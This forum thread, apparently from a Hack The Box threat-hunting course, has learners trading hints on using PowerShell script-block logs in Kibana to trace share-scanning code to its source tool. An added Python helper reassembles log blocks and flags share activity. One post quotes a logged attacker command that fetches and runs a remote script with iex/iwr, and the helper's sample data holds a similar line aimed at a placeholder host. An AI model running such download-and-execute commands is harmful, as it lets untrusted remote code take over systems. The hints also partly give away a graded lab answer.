Stuxbot - INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC

Some PowerShell code has been loaded into memory that scans/targets network shares. Leverage the available PowerShell logs to identify from which popular hacking tool this code derives. Answer format (one word): P____V___

Hi Guys,

Has anyone cracked this question? I was able to finish everything including the skill assessment but not this one. Any hints, clues, or steps are appreciated.


Hey, how did you find the "Enter your answer for Hunt 2." on the skill assessment?

Check this post!
https://forum.hackthebox.com/t/hunting-for-stuxbot-help/293247

Hey, I managed to solve this question. It was a bit tricky as it required something that was not mentioned in the module. You will want to pay close attention to logs that have a field powershell.file.script_block_text and look for anything network connected. Then just follow the hint ;))


Hello, I am having some trouble with the skill assessment,
how did you get this done?

Going crazy with this one: "Leverage the available PowerShell logs to identify from which popular hacking tool this code derives. Answer format (one word): P____V___".

Followed the hint and @Ignor's idea with any ++ result. Any other idea? Thanks

I solved this question. You have to find the events that occurred from powershell and, as @Ignor said, filter the logs.

Hint:


I eventually figured out the solution. It was purely by accident and a bit of guesswork. From the solution, my advice is to pay attention to the previous question about mimikatz.exe. Mimikatz was used in the process of hacking. This is the only link I found between the solution and what was taught through the lesson. Also, note the earlier hint to analyze powershell.file.script_block_text. Note the winlog.event_id or process.id for mimikatz, and read through the script block.

I am also looking for this, but currently I am stuck. Any luck with this?

Hello, I've been days on this one, can someone help me please?
I can't do it even with the info they said.

Hi, I also have a lot of trouble with this question. I use the hint from Ignor and also find some logs, but I can't find the answer for the question. I need another hint. Is there anyone who can help me? cheers yoho

Start with what you know, the timeline and the initial compromised host. That gives you a good place to start with alerts. Then set a filter to only show those alerts that contain the aforementioned field: powershell.file.script_block_text. You can also make it easier for yourself by displaying a column of that field as well as another field that contains the order of the script blocks. Alternatively, grab a block and put it into a .ps1 file and upload it to something like VirusTotal. It should be able to identify it for you… good luck!

Hunt 3: I found the answer but I can't understand it. I didn't use DC1 in the filter. Can someone explain it to me exactly?

For those who are having difficulties, you can try this filter:

powershell.file.


Hey, I'm working on hunt 3. Any hints? I tried filtering using 4104, then down to host.hostname DC1, can't figure out what to do next. Does this have anything to do with using zeek? ACTUALLY I got the answer but don't know how it is.

Hi All,

I managed it, but when I went on to the next chapter “Skill Assessment” I noticed that the explanation is there.
See PowerShell logs and the hint for Hunt3.

I don't know, maybe the questions were originally planned in a different order or HTB just simply liked to challenge us.

Hopefully works for you as well,
Thanks


I have checked every single event regarding powershell.exe and the only script I can find is the “-nop, -w, hidden, -noni, -noexit, iex (iwr https://pastebin.com/raw/33Z1jP6J -usebasicparsing)” but if I Google any of that, I get nowhere. What am I missing?

For those finding it challenging at the moment, I just figured it out myself:

  1. I read the PowerShell Logs (link) from the Skill Assessment (just the next page) and found the EventCode 4104 useful, which the article focused on.
  2. I filtered the event code with the host name and set my date range to cover March 26th from 22:05:00:00 to March 29, 22:00:00:00, which the attack spanned.
  3. I filtered for the powershell.file.script_block_text field; it provided 193 logs and I went through them until I found the required characters P and V in the powershell.file.script_block_text field, which showed up in the column. YOU WOULD FIND THE ANSWER!

It's actually a bit outside the current module but it was challenging; I spent roughly 5 hours on this.
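The procedure the posts above describe (keep only 4104 script block events, narrow to the host, reassemble each block in order, then look for share-related content) can be scripted outside Kibana. This is an added example, not from the thread or from HTB; it assumes winlogbeat's ECS field names (powershell.file.script_block_text, powershell.file.script_block_id, powershell.sequence, powershell.total) and uses constructed sample events, hostnames and script text.

```python
import re
from collections import defaultdict


def _ev(event_id, host, block_id, seq, total, text):
    # Shape of a winlogbeat ECS document for the fields we need (constructed).
    return {"winlog": {"event_id": event_id}, "host": {"hostname": host},
            "powershell": {"sequence": seq, "total": total,
                           "file": {"script_block_id": block_id,
                                    "script_block_text": text}}}


# Constructed sample events: one block split over two 4104 records (logged out
# of order), a benign block, a block on another host, and a non-4104 record.
SAMPLE_EVENTS = [
    _ev(4104, "DC1", "blk-1", 2, 2, " net view \\\\$h /all } }"),
    _ev(4104, "DC1", "blk-1", 1, 2, "function Invoke-ShareScan { foreach ($h in $Hosts) {"),
    _ev(4104, "DC1", "blk-2", 1, 1, "Get-Date; Write-Host 'maintenance'"),
    _ev(4104, "WS01", "blk-3", 1, 1, "iex (iwr http://example.invalid/raw -usebasicparsing)"),
    _ev(4103, "DC1", "blk-4", 1, 1, "Get-SmbShare -Name Finance"),  # not a 4104
]

# Generic indicators that a script block enumerates or targets network shares.
SHARE_INDICATORS = {
    "unc_path": re.compile(r"\\\\[\w$.-]+"),
    "net view": re.compile(r"\bnet\s+view\b", re.I),
    "NetShareEnum": re.compile(r"NetShareEnum", re.I),
    "Get-SmbShare": re.compile(r"Get-SmbShare", re.I),
}


def filter_events(events, host=None):
    """Keep only script block logging events (4104), optionally for one host."""
    return [e for e in events if e["winlog"]["event_id"] == 4104
            and (host is None or e["host"]["hostname"] == host)]


def reassemble_blocks(events):
    """Join the parts of each script block in powershell.sequence order."""
    parts = defaultdict(list)
    for e in events:
        ps = e["powershell"]
        parts[ps["file"]["script_block_id"]].append((ps["sequence"], ps["file"]["script_block_text"]))
    return {bid: "".join(t for _, t in sorted(p)) for bid, p in parts.items()}


def find_share_activity(blocks):
    """Return {block_id: [indicator names]} for blocks that touch network shares."""
    return {bid: hits for bid, text in blocks.items()
            if (hits := [n for n, rx in SHARE_INDICATORS.items() if rx.search(text)])}


if __name__ == "__main__":
    print(find_share_activity(reassemble_blocks(filter_events(SAMPLE_EVENTS, "DC1"))))
```

Once a block is flagged, the reassembled text is what you read through (or submit to a scanner, as suggested above) to attribute it; the indicators here are deliberately generic and do not name any tool.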

Many thanks. I had to sift through around 100 logs before I found it, but I got there in the end.

For easy navigation to the file and a smart way to get the file, filter the file.name field with the *exe * keyword and it's going to generate far fewer files - I just found out this approach recently. The power of Kibana lies in the query.